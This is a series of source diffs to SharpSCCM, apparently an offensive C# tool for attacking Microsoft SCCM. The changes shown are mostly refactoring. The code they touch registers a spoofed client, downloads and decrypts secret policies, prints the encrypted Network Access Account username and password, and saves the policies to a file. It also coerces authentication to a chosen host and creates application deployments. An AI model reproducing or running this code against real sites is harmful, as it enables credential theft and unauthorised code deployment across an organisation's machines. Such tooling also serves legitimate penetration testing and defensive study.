+                    DeleteUserCertificate(certificate);
+                    string decryptedPolicyBody = Encoding.ASCII.GetString(pkcs7EnvelopedCms.ContentInfo.Content).Replace("\0", string.Empty);
+                    output += decryptedPolicyBody;
+                    
+                    if (decryptedPolicyBody.Contains("NetworkAccess"))
+                    {
+                        XmlDocument policyXmlDoc = new XmlDocument();
+                        policyXmlDoc.LoadXml(decryptedPolicyBody.Trim().Remove(0, 2));
+                        string encryptedUsername = policyXmlDoc.SelectSingleNode("//instance").FirstChild.NextSibling.InnerText;
+                        string encryptedPassword = policyXmlDoc.SelectSingleNode("//instance").FirstChild.NextSibling.NextSibling.InnerText;
+                        Console.WriteLine($"[+] Encrypted NAA username: {encryptedUsername}");
+                        Console.WriteLine($"[+] Encrypted NAA password: {encryptedPassword}");
+                    }
 
                     /*
-                    // Code borrowed from SetCustomHeader method
+                    // Code borrowed from SetCustomHeader method, exception on Decrypt method
                     ConfigMgrPolicyBodyDownloadRequest policyDownloadRequest = new ConfigMgrPolicyBodyDownloadRequest(assignmentReply, policyAssignment);
                     Dictionary<string, object> senderProperty = (Dictionary<string, object>)policyDownloadRequest.Settings.SenderProperties["HttpSender", "HttpHeaders"];
                     string clientTokenHeader = $"{clientId};{TimeHelpers.CurrentTimeAsIso8601};2";
@@ -132,52 +131,11 @@ namespace SharpSCCM
                     */
                 }
             }
-            
-            
-            //Console.WriteLine($"[+] Policy assignment reply body:\n {assignmentReply.Body}");
-
-            //ConfigMgrPolicyBodyDownloadRequest policyDownloadRequest = new ConfigMgrPolicyBodyDownloadRequest(assignmentReply);
-
-            // Add our certificate for message signing and encryption
-            //policyDownloadRequest.AddCertificateToMessage(certificate, CertificatePurposes.Signing | CertificatePurposes.Encryption);
-
-            // Discover local properties and configure message settings
-            //policyDownloadRequest.Discover();
-            //policyDownloadRequest.SmsId = clientId;
-            //policyDownloadRequest.DownloadSecrets = true;
-            //policyDownloadRequest.Settings.HostName = server;
-            //policyDownloadRequest.Settings.Compression = MessageCompression.Zlib;
-            //policyDownloadRequest.Settings.ReplyCompression = MessageCompression.Zlib;
-            //policyDownloadRequest.SiteCode = sitecode;
-            //policyDownloadRequest.ForceSmsIdSignature = true;
-            //policyDownloadRequest.SerializeMessageBody();
-
-            //Console.WriteLine($"[+] Sending policy download request to {policyDownloadRequest.Settings.HostName}:{policyDownloadRequest.SiteCode}");
-            //Console.WriteLine($"[+] Policy request body:\n{System.Xml.Linq.XElement.Parse("<root>" + policyDownloadRequest.Body + "</root>")}");
-            //foreach (var attachment in policyDownloadRequest.Attachments)
-            //{
-            //    Console.WriteLine(attachment.Body);
-            //}
-
-            
-            //ConfigMgrPolicyBodyDownloadReply policyDownloadReply = policyDownloadRequest.SendMessage(sender);
-            /*
-            Console.WriteLine("\n[+] Policy download reply body:\n");
-            
-            foreach (PolicyBody policyBody in policyDownloadReply.ReplyPolicyBodies)
+            if (!string.IsNullOrEmpty(outputPath))
             {
-                Console.WriteLine(policyBody.RawPolicyText);
-                if (policyBody.RawPolicyText.Contains("NetworkAccess"))
-                {
-                    XmlDocument policyXmlDoc = new XmlDocument();
-                    policyXmlDoc.LoadXml(policyBody.RawPolicyText.Trim().Remove(0, 1));
-                    string encryptedUsername = policyXmlDoc.SelectSingleNode("//instance").FirstChild.NextSibling.InnerText;
-                    string encryptedPassword = policyXmlDoc.SelectSingleNode("//instance").FirstChild.NextSibling.NextSibling.InnerText;
-                    Console.WriteLine($"\n[+] Encrypted NetworkAccessUsername: {encryptedUsername}");
-                    Console.WriteLine($"\n[+] Encrypted NetworkAccessPassword: {encryptedPassword}");
-                }
+                File.WriteAllText(outputPath, output);
+                Console.WriteLine($"[+] Wrote secret policies to {outputPath}");
             }
-            */
         }
 
         public static MessageCertificateX509 GetSigningCertificate()
@@ -187,15 +145,11 @@ namespace SharpSCCM
             return certificate;
         }
 
-        public static SmsClientId RegisterClient(MessageCertificateX509 certificate, string target, string managementPoint, string siteCode, string authenticationType = null, string computer = null, string password = null)
+        public static SmsClientId RegisterClient(MessageCertificateX509 certificate, string target, string managementPoint, string siteCode, string authenticationType = null, string username = null, string password = null)
         {
-            // HTTP sender is used for sending messages to the MP
             HttpSender sender = new HttpSender();
-
-            // Create a registration request
             ConfigMgrRegistrationRequest registrationRequest = new ConfigMgrRegistrationRequest();
-
-            // Add our certificate for message signing
+            // Add the certificate that will be tied to the new client ID for message signing and encryption
             registrationRequest.AddCertificateToMessage(certificate, CertificatePurposes.Signing | CertificatePurposes.Encryption);
 
             // Discover local properties for client registration request
@@ -203,15 +157,15 @@ namespace SharpSCCM
             registrationRequest.Discover();
 
             // Modify properties
-            Console.WriteLine("[+] Modifying client registration request properties");
+            Console.WriteLine("[+] Modifying client registration request properties:");
             registrationRequest.AgentIdentity = "CCMSetup.exe";
             if (!string.IsNullOrEmpty(target))
             {
                 registrationRequest.ClientFqdn = target;
                 registrationRequest.NetBiosName = target;
             }
-            Console.WriteLine($"    ClientFqdn: {registrationRequest.ClientFqdn}"); // Original ClientFqdn derived from HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName\ComputerName + <domain name>
-            Console.WriteLine($"    NetBiosName: {registrationRequest.NetBiosName}"); // Original NetBiosName derived from HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName\ComputerName
+            Console.WriteLine($"      FQDN: {registrationRequest.ClientFqdn}"); // Original ClientFqdn derived from HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName\ComputerName + <domain name>
+            Console.WriteLine($"      NetBIOS name: {registrationRequest.NetBiosName}"); // Original NetBiosName derived from HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName\ComputerName
             registrationRequest.Settings.HostName = managementPoint;
             registrationRequest.Settings.Compression = MessageCompression.Zlib;
             registrationRequest.Settings.ReplyCompression = MessageCompression.Zlib;
@@ -219,13 +173,13 @@ namespace SharpSCCM
             if (authenticationType == "Windows")
             {
                 registrationRequest.Settings.Security.AuthenticationType = AuthenticationType.WindowsAuth;
-                if (!string.IsNullOrEmpty(computer) && !string.IsNullOrEmpty(password))
+                if (!string.IsNullOrEmpty(username) && !string.IsNullOrEmpty(password))
                 {
-                    Console.WriteLine($"    Using machine account: {computer}");
-                    registrationRequest.Settings.Security.Credentials = new NetworkCredential(computer, password);
+                    Console.WriteLine($"      Authenticating as: {username}");
+                    registrationRequest.Settings.Security.Credentials = new NetworkCredential(username, password);
                 }
             }
-            Console.WriteLine($"    SiteCode: {registrationRequest.SiteCode}");
+            Console.WriteLine($"      Site code: {registrationRequest.SiteCode}");
 
             // Serialize message XML and display to user
             registrationRequest.SerializeMessageBody();
@@ -234,7 +188,7 @@ namespace SharpSCCM
             // Register client and wait for a confirmation with the SMSID
             Console.WriteLine($"[+] Sending HTTP registration request to {registrationRequest.Settings.HostName}:{registrationRequest.Settings.HttpPort}");
             SmsClientId clientId = registrationRequest.RegisterClient(sender, TimeSpan.FromMinutes(5));
-            Console.WriteLine($"[+] Received unique GUID for new device: {clientId.ToString()}");
+            Console.WriteLine($"[+] Received unique GUID for new device: {clientId}");
             return clientId;
         }
 
@@ -267,7 +221,8 @@ namespace SharpSCCM
             ddrMessage.Settings.SourceHost = target;
             ddrMessage.NetBiosName = target;
             ddrMessage.SiteCode = siteCode;
-            ddrMessage.SerializeMessageBody(); // This is required to build the DDR XML and inventory report XML but must take place after all modifications to the DDR message body
+            // This is required to build the DDR XML and inventory report XML but must take place after all modifications to the DDR message body
+            ddrMessage.SerializeMessageBody(); 
 
             // Update inventory report header with new device information
             ddrMessage.InventoryReport.ReportHeader.Identification.Machine.ClientId = new InventoryClientIdBase(clientId);
@@ -319,14 +274,28 @@ namespace SharpSCCM
             Console.WriteLine("[+] Done!");
         }
 
-        public static HttpResponseMessage SendPolicyDownloadRequest(string url, string clientId = "", MessageCertificateX509 certificate = null)
+        public static ConfigMgrPolicyAssignmentReply SendPolicyAssignmentRequest(SmsClientId clientId, MessageCertificateX509 certificate, string managementPoint, string siteCode)
+        {
+            HttpSender sender = new HttpSender();
+            ConfigMgrPolicyAssignmentRequest assignmentRequest = new ConfigMgrPolicyAssignmentRequest();
+            // Sign message with the certificate associated with the SmsId
+            assignmentRequest.AddCertificateToMessage(certificate, CertificatePurposes.Signing);
+            assignmentRequest.SmsId = clientId;
+            assignmentRequest.Settings.HostName = managementPoint;
+            assignmentRequest.SiteCode = siteCode;
+            Console.WriteLine($"[+] Obtaining {assignmentRequest.RequestType} {assignmentRequest.ResourceType} policy assignment from {assignmentRequest.Settings.HostName} {assignmentRequest.SiteCode}");
+            ConfigMgrPolicyAssignmentReply assignmentReply = assignmentRequest.SendMessage(sender);
+            Console.WriteLine($"[+] Found {assignmentReply.ReplyAssignments.PolicyAssignments.Count} policy assignments");
+            return assignmentReply;
+        }
+
+        public static HttpResponseMessage SendPolicyDownloadRequest(string url, string clientId = null, MessageCertificateX509 certificate = null)
         {
             HttpClientHandler httpClientHandler = new HttpClientHandler() { AutomaticDecompression = DecompressionMethods.GZip | DecompressionMethods.Deflate };
             HttpClient httpClient = new HttpClient(httpClientHandler);
             httpClient.DefaultRequestHeaders.Add("User-Agent", "ConfigMgr Messaging HTTP Sender");
-            httpClient.DefaultRequestHeaders.Add("Accept", "*/*");
-            httpClient.DefaultRequestHeaders.ConnectionClose = true;
             var request = new HttpRequestMessage(HttpMethod.Get, url);
+            // Add authentication headers required to download policies flagged "Secret"
             if (!string.IsNullOrEmpty(clientId) && (certificate != null))
             {
                 string currentTimeAsIso = TimeHelpers.CurrentTimeAsIso8601;
@@ -334,13 +303,12 @@ namespace SharpSCCM
                 httpClient.DefaultRequestHeaders.Add("ClientToken", clientTokenHeader);
                 byte[] clientTokenHeaderBytes = Encoding.Unicode.GetBytes(clientTokenHeader + "\0");
                 string clientTokenSignatureHeader = certificate.Sign(clientTokenHeaderBytes, "SHA256", MessageCertificateSigningOptions.CryptNoHashId).HexBinaryEncode().ToUpperInvariant();
-                Console.WriteLine("[+] Adding authentication headers to message\n" +
-                                  $"    ClientToken: {clientTokenHeader}\n" +
-                                  $"    ClientTokenSignature: {clientTokenSignatureHeader}"
+                Console.WriteLine("[+] Adding authentication headers to download request:\n" +
+                                  $"      ClientToken: {clientTokenHeader}\n" +
+                                  $"      ClientTokenSignature: {clientTokenSignatureHeader}"
                                   );
                 httpClient.DefaultRequestHeaders.Add("ClientTokenSignature", clientTokenSignatureHeader);
             }
-
             var response = httpClient.SendAsync(request).Result;
             return response;
         }

--- a/lib/MgmtPointMessaging.cs
+++ b/lib/MgmtPointMessaging.cs
@@ -72,7 +72,7 @@ namespace SharpSCCM
             var x509Store = new X509Store("My", StoreLocation.CurrentUser);
             x509Store.Open(OpenFlags.MaxAllowed);
             x509Store.Remove(certificate.X509Certificate);
-            Console.WriteLine($"[+] Deleted \"{certificate.X509Certificate.SubjectName}\" certificate from {x509Store.Name} store for {x509Store.Location}");
+            Console.WriteLine($"[+] Deleted \"{certificate.X509Certificate.SubjectName.Name}\" certificate from {x509Store.Name} store for {x509Store.Location}");
         }
         
         public static MessageCertificateX509 GetMachineEncryptionCertificate()

--- a/lib/MgmtPointWmi.cs
+++ b/lib/MgmtPointWmi.cs
@@ -44,14 +44,14 @@ namespace SharpSCCM
             GetCollectionMember(scope, collectionName, false, null, null, false, false);
         }
 
-        public static void GenerateCCR(string target, string server = null, string sitecode = null)
+        public static void GenerateCCR(string target, string server = null, string siteCode = null)
         {
-            ManagementScope wmiConnection = MgmtUtil.NewWmiConnection(server, null, sitecode);
+            ManagementScope wmiConnection = MgmtUtil.NewWmiConnection(server, null, siteCode);
             Console.WriteLine($"[+] Generating a client configuration request (CCR) to coerce authentication to {target}");
             ManagementClass collectionClass = new ManagementClass(wmiConnection, new ManagementPath("SMS_Collection"), null);
             ManagementBaseObject generatorParams = collectionClass.GetMethodParameters("GenerateCCRByName");
             generatorParams.SetPropertyValue("Name", target);
-            generatorParams.SetPropertyValue("PushSiteCode", sitecode);
+            generatorParams.SetPropertyValue("PushSiteCode", siteCode);
             generatorParams.SetPropertyValue("Forced", false);
             collectionClass.InvokeMethod("GenerateCCRByName", generatorParams, null);
         }
@@ -74,9 +74,9 @@ namespace SharpSCCM
             }
         }
 
-        public static void GetSitePushSettings(string server = null, string sitecode = null)
+        public static void GetSitePushSettings(string server = null, string siteCode = null)
         {
-            ManagementScope wmiConnection = MgmtUtil.NewWmiConnection(server, null, sitecode);
+            ManagementScope wmiConnection = MgmtUtil.NewWmiConnection(server, null, siteCode);
             ManagementObjectSearcher searcher = new ManagementObjectSearcher(wmiConnection, new ObjectQuery($"SELECT PropertyName, Value, Value1 FROM SMS_SCI_SCProperty WHERE ItemType='SMS_DISCOVERY_DATA_MANAGER' AND (PropertyName='ENABLEKERBEROSCHECK' OR PropertyName='FILTERS' OR PropertyName='SETTINGS')"));
             ManagementObjectCollection results = searcher.Get();
             foreach (ManagementObject result in results)
@@ -419,7 +419,7 @@ namespace SharpSCCM
             else
             {
                 Console.WriteLine($"[+] Creating new deployment of {application} to {collection}");
-                string sitecode = scope.Path.ToString().Split('_').Last();
+                string siteCode = scope.Path.ToString().Split('_').Last();
                 string now = DateTime.Now.ToString("yyyyMMddHHmmss" + ".000000+***");
                 ManagementObject deployment = new ManagementClass(scope, new ManagementPath("SMS_ApplicationAssignment"), null).CreateInstance();
                 deployment["ApplicationName"] = application;
@@ -437,7 +437,7 @@ namespace SharpSCCM
                 deployment["Priority"] = 2; // HIGH
                 deployment["RebootOutsideOfServiceWindows"] = false;
                 deployment["SoftDeadlineEnabled"] = true;
-                deployment["SourceSite"] = sitecode;
+                deployment["SourceSite"] = siteCode;
                 deployment["StartTime"] = now;
                 deployment["SuppressReboot"] = 0;
                 deployment["UseGMTTimes"] = true;

--- a/lib/MgmtPointWmi.cs
+++ b/lib/MgmtPointWmi.cs
@@ -44,11 +44,11 @@ namespace SharpSCCM
             GetCollectionMember(scope, collectionName, false, null, null, false, false);
         }
 
-        public static void GenerateCCR(string server, string sitecode, string target)
+        public static void GenerateCCR(string target, string server = null, string sitecode = null)
         {
-            ManagementScope sccmConnection = MgmtUtil.NewSccmConnection("\\\\" + server + "\\root\\SMS\\site_" + sitecode);
+            ManagementScope wmiConnection = MgmtUtil.NewWmiConnection(server, null, sitecode);
             Console.WriteLine($"[+] Generating a client configuration request (CCR) to coerce authentication to {target}");
-            ManagementClass collectionClass = new ManagementClass(sccmConnection, new ManagementPath("SMS_Collection"), null);
+            ManagementClass collectionClass = new ManagementClass(wmiConnection, new ManagementPath("SMS_Collection"), null);
             ManagementBaseObject generatorParams = collectionClass.GetMethodParameters("GenerateCCRByName");
             generatorParams.SetPropertyValue("Name", target);
             generatorParams.SetPropertyValue("PushSiteCode", sitecode);
@@ -74,10 +74,10 @@ namespace SharpSCCM
             }
         }
 
-        public static void GetSitePushSettings(string server, string sitecode)
+        public static void GetSitePushSettings(string server = null, string sitecode = null)
         {
-            ManagementScope sccmConnection = MgmtUtil.NewSccmConnection("\\\\" + server + "\\root\\SMS\\site_" + sitecode);
-            ManagementObjectSearcher searcher = new ManagementObjectSearcher(sccmConnection, new ObjectQuery($"SELECT PropertyName, Value, Value1 FROM SMS_SCI_SCProperty WHERE ItemType='SMS_DISCOVERY_DATA_MANAGER' AND (PropertyName='ENABLEKERBEROSCHECK' OR PropertyName='FILTERS' OR PropertyName='SETTINGS')"));
+            ManagementScope wmiConnection = MgmtUtil.NewWmiConnection(server, null, sitecode);
+            ManagementObjectSearcher searcher = new ManagementObjectSearcher(wmiConnection, new ObjectQuery($"SELECT PropertyName, Value, Value1 FROM SMS_SCI_SCProperty WHERE ItemType='SMS_DISCOVERY_DATA_MANAGER' AND (PropertyName='ENABLEKERBEROSCHECK' OR PropertyName='FILTERS' OR PropertyName='SETTINGS')"));
             ManagementObjectCollection results = searcher.Get();
             foreach (ManagementObject result in results)
             {
@@ -126,7 +126,7 @@ namespace SharpSCCM
                     }
                 }
             }
-            searcher = new ManagementObjectSearcher(sccmConnection, new ObjectQuery($"SELECT Values FROM SMS_SCI_SCPropertyList WHERE PropertyListName='Reserved2'"));
+            searcher = new ManagementObjectSearcher(wmiConnection, new ObjectQuery($"SELECT Values FROM SMS_SCI_SCPropertyList WHERE PropertyListName='Reserved2'"));
             results = searcher.Get();
             foreach (ManagementObject result in results)
             {
@@ -362,7 +362,8 @@ namespace SharpSCCM
                 </AppMgmtDigest>
                 ";
 
-                // Debug XML with assistance from Config Manager SDK
+                //
+                // XML with assistance from Config Manager SDK
                 //Application appInstance = SccmSerializer.DeserializeFromString(xml, true);
                 //string xmla = SccmSerializer.SerializeToString(appInstance, true);
 

--- a/lib/MgmtPointWmi.cs
+++ b/lib/MgmtPointWmi.cs
@@ -4,7 +4,7 @@ using System.Management;
 
 namespace SharpSCCM
 {
-    static class MgmtPointWmi
+    public static class MgmtPointWmi
     {
         public static void AddDeviceToCollection(ManagementScope scope, string deviceName, string collectionName)
         {
@@ -39,8 +39,8 @@ namespace SharpSCCM
                 collection.InvokeMethod("AddMembershipRule", addMembershipRuleParams, null);
             }
             Console.WriteLine($"[+] Added {userName} to {collectionName}");
-            Console.WriteLine("[+] Waiting 10s for collection to populate");
-            System.Threading.Thread.Sleep(10000);
+            Console.WriteLine("[+] Waiting 15s for collection to populate");
+            System.Threading.Thread.Sleep(15000);
             GetCollectionMember(scope, collectionName, false, null, null, false, false);
         }
 
@@ -185,7 +185,7 @@ namespace SharpSCCM
         
         public static void InvokeLastLogonUpdate(ManagementScope scope, string collectionName)
         {
-            // TO DO
+            // TODO
         }
 
         public static void InvokeUpdate(ManagementScope scope, string collectionName)

--- a/lib/MgmtUtil.cs
+++ b/lib/MgmtUtil.cs
@@ -2,147 +2,89 @@
 using System.Collections.Generic;
 using System.Linq;
 using System.Management;
+//using System.Text.Json;
 
 namespace SharpSCCM
 {
     public class MgmtUtil
     {
-        public static void GetClasses(ManagementScope scope)
+        public static string BuildClassInstanceQueryString(ManagementScope scope, string wmiClass, bool count = false, string[] properties = null, string whereCondition = null, string orderByColumn = null, bool verbose = false)
         {
-            string query = "SELECT * FROM meta_class";
-            Console.WriteLine($"[+] Executing WQL query: {query}");
-            ObjectQuery objQuery = new ObjectQuery(query);
-            ManagementObjectSearcher searcher = new ManagementObjectSearcher(scope, objQuery);
-            var classes = new List<string>();
-            foreach (ManagementClass wmiClass in searcher.Get())
+            string propString;
+            if (verbose || count || properties == null)
             {
-                classes.Add(wmiClass["__CLASS"].ToString());
+                propString = "*";
             }
-            classes.Sort();
-            Console.WriteLine(String.Join("\n", classes.ToArray()));
+            else
+            {
+                string[] keyPropertyNames = GetKeyPropertyNames(scope, wmiClass);
+                properties = keyPropertyNames.Union(properties).ToArray();
+                propString = string.Join(",", properties);
+            }
+
+            string whereClause = "";
+            if (!string.IsNullOrEmpty(whereCondition))
+            {
+                whereClause = $"WHERE {whereCondition}";
+            }
+
+            string orderByClause = "";
+            if (!string.IsNullOrEmpty(orderByColumn))
+            {
+                orderByClause = $"ORDER BY {orderByColumn}";
+            }
+
+            string query;
+            if (count)
+            {
+                query = $"SELECT COUNT({propString}) FROM {wmiClass} {whereClause}";
+            }
+            else
+            {
+                query = $"SELECT {propString} FROM {wmiClass} {whereClause} {orderByClause}";
+            }
+            return query;
+        }
+
+        public static ManagementObjectCollection GetClassInstanceCollection(ManagementScope scope, string wmiClass, string query)
+        {
+            ManagementObjectCollection classInstances = null;
+            try
+            {
+                Console.WriteLine($"[+] Executing WQL query: {query}");
+                ObjectQuery objQuery = new ObjectQuery(query);
+                ManagementObjectSearcher searcher = new ManagementObjectSearcher(scope, objQuery);
+                classInstances = searcher.Get();
+                
+            }
+            catch (ManagementException error)
+            {
+                Console.WriteLine("An error occurred while querying for WMI data: " + error.Message);
+            }
+            catch(Exception error)
+            {
+                Console.WriteLine($"An unhandled exception of type {error.GetType()} occurred: {error.Message}");
+            }
+            return classInstances;
         }
 
         public static void GetClassInstances(ManagementScope scope, string wmiClass, bool count = false, string[] properties = null, string whereCondition = null, string orderByColumn = null, bool dryRun = false, bool verbose = false, bool getLazyProps = true)
         {
-            try
+            string query = BuildClassInstanceQueryString(scope, wmiClass, count, properties, whereCondition, orderByColumn, verbose);
+            if (dryRun)
             {
-                string query = "";
-                string propString = "";
-                string whereClause = "";
-                string orderByClause = "";
-
-                if (verbose || count || properties == null)
-                {
-                    propString = "*";
-                }
-                else
-                {
-                    string[] keyPropertyNames = GetKeyPropertyNames(scope, wmiClass);
-                    properties = keyPropertyNames.Union(properties).ToArray();
-                    propString = string.Join(",", properties);
-                }
-                if (!string.IsNullOrEmpty(whereCondition))
-                {
-                    whereClause = $"WHERE {whereCondition}";
-                }
-                if (!string.IsNullOrEmpty(orderByColumn))
-                {
-                    orderByClause = $"ORDER BY {orderByColumn}";
-                }
-                if (count)
-                {
-                    query = $"SELECT COUNT({propString}) FROM {wmiClass} {whereClause}";
-                }
-                else
-                {
-                    query = $"SELECT {propString} FROM {wmiClass} {whereClause} {orderByClause}";
-                }
-
-                if (dryRun)
-                {
-                    Console.WriteLine($"[+] WQL query: {query}");
-                }
-                else
-                {
-                    Console.WriteLine($"[+] Executing WQL query: {query}\n");
-                    ObjectQuery objQuery = new ObjectQuery(query);
-                    ManagementObjectSearcher searcher = new ManagementObjectSearcher(scope, objQuery);
-                    Console.WriteLine("-----------------------------------");
-                    Console.WriteLine(wmiClass);
-                    Console.WriteLine("-----------------------------------");
-                    foreach (ManagementObject queryObj in searcher.Get())
-                    {
-                        // Get lazy properties unless we're just counting instances or we explicitly don't want lazy props
-                        if (!count && getLazyProps)
-                        {
-                            queryObj.Get();
-                        }
-                        foreach (PropertyData prop in queryObj.Properties)
-                        {
-                            // Print default properties if none specified, named properties if specified, or all properties if verbose
-                            if (properties == null || properties.Length == 0 || properties.Contains(prop.Name) || count || verbose)
-                            {
-                                if (prop.IsArray)
-                                {
-                                    // Test to see if we can display property values as strings, otherwise bail. Byte[] (e.g., Device.ObjectGUID) breaks things, Object[] (e.g., Collection.CollectionRules, Collection.RefreshSchedule) breaks things
-                                    if (prop.Value is String[])
-                                    {
-                                        String[] nestedValues = (String[])(prop.Value);
-                                        Console.WriteLine($"{prop.Name}: {string.Join(", ", nestedValues)}");
-                                    }
-                                    else if (prop.Value is int[])
-                                    {
-                                        int[] nestedValues = (int[])(prop.Value);
-                                        string[] nestedValueStrings = nestedValues.Select(x => x.ToString()).ToArray();
-                                        Console.WriteLine($"{prop.Name}: {string.Join(", ", nestedValueStrings)}");
-                                    }
-                                    else
-                                    {
-                                        string canConvertToString = prop.Value as string;
-                                        if (canConvertToString != null)
-                                        {
-                                            Console.WriteLine($"{prop.Name}: {canConvertToString}");
-                                        }
-                                        else
-                                        {
-                                            Console.WriteLine($"{prop.Name}: Can't display {prop.Type.ToString()} as a String");
-                                        }
-                                    }
-                                }
-                                else
-                                {
-                                    Console.WriteLine("{0}: {1}", prop.Name, prop.Value);
-                                }
-                            }
-                        }
-                        Console.WriteLine("-----------------------------------");
-                    }
-                }
+                Console.WriteLine($"[+] WQL query: {query}");
             }
-            catch (ManagementException err)
+            else
             {
-                Console.WriteLine("An error occurred while querying for WMI data: " + err.Message);
+                ManagementObjectCollection classInstanceCollection = GetClassInstanceCollection(scope, wmiClass, query);
+                PrintClassInstances(scope, wmiClass, query, classInstanceCollection, count, properties, verbose, getLazyProps);
             }
         }
 
-        public static void GetClassProperties(ManagementObject classInstance, bool showValue = false)
+        public static string[] GetKeyPropertyNames(ManagementScope wmiConnection, string className)
         {
-            foreach (PropertyData property in classInstance.Properties)
-            {
-                if (!showValue)
-                {
-                    Console.WriteLine($"{property.Name} ({property.Type})");
-                }
-                else
-                {
-                    Console.WriteLine($"{property.Name} ({property.Type}): {property.Value}");
-                }
-            }
-        }
-
-        public static string[] GetKeyPropertyNames(ManagementScope sccmConnection, string className)
-        {
-            using (ManagementClass managementClass = new ManagementClass(sccmConnection, new ManagementPath(className), new ObjectGetOptions()))
+            using (ManagementClass managementClass = new ManagementClass(wmiConnection, new ManagementPath(className), new ObjectGetOptions()))
             {
                 return managementClass.Properties
                     .Cast<PropertyData>()
@@ -174,30 +116,153 @@ namespace SharpSCCM
                     Console.WriteLine("-----------------------------------");
                 }
             }
-            catch (ManagementException err)
+            catch (ManagementException error)
             {
-                Console.WriteLine("An error occurred while querying for WMI data: " + err.Message);
+                Console.WriteLine("An error occurred while querying for WMI data: " + error.Message);
+            }
+            catch (Exception error)
+            {
+                Console.WriteLine($"An unhandled exception of type {error.GetType()} occurred: {error.Message}");
             }
         }
 
-        public static ManagementScope NewSccmConnection(string path)
+        public static ManagementScope NewWmiConnection(string server = null, string wmiNamespace = null, string sitecode = null)
         {
+            string path = "";
             ConnectionOptions connection = new ConnectionOptions();
-            ManagementScope sccmConnection = new ManagementScope(path, connection);
+            if (server == "localhost")
+            {
+                if (string.IsNullOrEmpty(wmiNamespace))
+                {
+                    wmiNamespace = "root\\ccm";
+                }
+                path = $"\\\\{server}\\{wmiNamespace}";
+            }
+            else if (!string.IsNullOrEmpty(wmiNamespace))
+            {
+                path = $"\\\\{server}\\{wmiNamespace}";
+            }
+            else if (!string.IsNullOrEmpty(server) && !string.IsNullOrEmpty(sitecode))
+            {
+                path = $"\\\\{server}\\root\\SMS\\site_{sitecode}";
+            }
+            else
+            {
+                (server, sitecode) = ClientWmi.GetCurrentManagementPointAndSiteCode();
+                path = $"\\\\{server}\\root\\SMS\\site_{sitecode}";
+            }
+            ManagementScope wmiConnection = new ManagementScope(path, connection);
             try
             {
-                Console.WriteLine($"[+] Connecting to {sccmConnection.Path}");
-                sccmConnection.Connect();
+                Console.WriteLine($"[+] Connecting to {wmiConnection.Path}");
+                wmiConnection.Connect();
             }
-            catch (System.UnauthorizedAccessException unauthorizedErr)
+            catch (UnauthorizedAccessException error)
             {
-                Console.WriteLine("[!] Access to WMI was not authorized (user name or password might be incorrect): " + unauthorizedErr.Message);
+                Console.WriteLine("[!] Access to WMI was not authorized (user name or password might be incorrect): " + error.Message);
             }
-            catch (Exception e)
+            catch (ManagementException error)
             {
-                Console.WriteLine("[!] Error connecting to WMI: " + e.Message);
+                Console.WriteLine("[!] Access to WMI was not authorized (user name or password might be incorrect): " + error.Message);
             }
-            return sccmConnection;
+            catch (Exception error)
+            {
+                Console.WriteLine($"An unhandled exception of type {error.GetType()} occurred: {error.Message}");
+            }
+            return wmiConnection;
+        }
+
+        public static void PrintClasses(ManagementScope scope)
+        {
+            string query = "SELECT * FROM meta_class";
+            Console.WriteLine($"[+] Executing WQL query: {query}");
+            ObjectQuery objQuery = new ObjectQuery(query);
+            ManagementObjectSearcher searcher = new ManagementObjectSearcher(scope, objQuery);
+            var classes = new List<string>();
+            foreach (ManagementClass wmiClass in searcher.Get())
+            {
+                classes.Add(wmiClass["__CLASS"].ToString());
+            }
+            classes.Sort();
+            Console.WriteLine(String.Join("\n", classes.ToArray()));
+            //string jsonString = JsonSerializer.Serialize(classes);
+            //Console.WriteLine(jsonString);
+        }
+
+        public static void PrintClassInstances(ManagementScope scope, string wmiClass, string query, ManagementObjectCollection classInstanceCollection, bool count = false, string[] properties = null, bool verbose = false, bool getLazyProps = true)
+        {
+            Console.WriteLine("-----------------------------------");
+            Console.WriteLine(wmiClass);
+            Console.WriteLine("-----------------------------------");
+            foreach (ManagementObject queryObj in classInstanceCollection)
+            {
+                // Get lazy properties unless we're just counting instances or we explicitly don't want lazy props
+                if (!count && getLazyProps)
+                {
+                    try
+                    {
+                        queryObj.Get();
+                    }
+                    catch (Exception error)
+                    {
+                        Console.WriteLine($"An unhandled exception of type {error.GetType().ToString()} occurred: {error.Message}");
+                    }
+                }
+                foreach (PropertyData prop in queryObj.Properties)
+                {
+                    // Print default properties if none specified, named properties if specified, or all properties if verbose
+                    if (properties == null || properties.Length == 0 || properties.Contains(prop.Name) || count || verbose)
+                    {
+                        if (prop.IsArray)
+                        {
+                            // Test to see if we can display property values as strings, otherwise bail. Byte[] (e.g., Device.ObjectGUID) breaks things, Object[] (e.g., Collection.CollectionRules, Collection.RefreshSchedule) breaks things
+                            if (prop.Value is String[])
+                            {
+                                String[] nestedValues = (String[])(prop.Value);
+                                Console.WriteLine($"{prop.Name}: {string.Join(", ", nestedValues)}");
+                            }
+                            else if (prop.Value is int[])
+                            {
+                                int[] nestedValues = (int[])(prop.Value);
+                                string[] nestedValueStrings = nestedValues.Select(x => x.ToString()).ToArray();
+                                Console.WriteLine($"{prop.Name}: {string.Join(", ", nestedValueStrings)}");
+                            }
+                            else
+                            {
+                                string canConvertToString = prop.Value as string;
+                                if (canConvertToString != null)
+                                {
+                                    Console.WriteLine($"{prop.Name}: {canConvertToString}");
+                                }
+                                else
+                                {
+                                    Console.WriteLine($"{prop.Name}: Can't display {prop.Type.ToString()} as a String");
+                                }
+                            }
+                        }
+                        else
+                        {
+                            Console.WriteLine("{0}: {1}", prop.Name, prop.Value);
+                        }
+                    }
+                }
+                Console.WriteLine("-----------------------------------");
+            }
+        }
+
+        public static void PrintClassProperties(ManagementObject classInstance, bool showValue = false)
+        {
+            foreach (PropertyData property in classInstance.Properties)
+            {
+                if (!showValue)
+                {
+                    Console.WriteLine($"{property.Name} ({property.Type})");
+                }
+                else
+                {
+                    Console.WriteLine($"{property.Name} ({property.Type}): {property.Value}");
+                }
+            }
         }
     }
 }

--- a/lib/MgmtUtil.cs
+++ b/lib/MgmtUtil.cs
@@ -126,7 +126,7 @@ namespace SharpSCCM
             }
         }
 
-        public static ManagementScope NewWmiConnection(string server = null, string wmiNamespace = null, string sitecode = null)
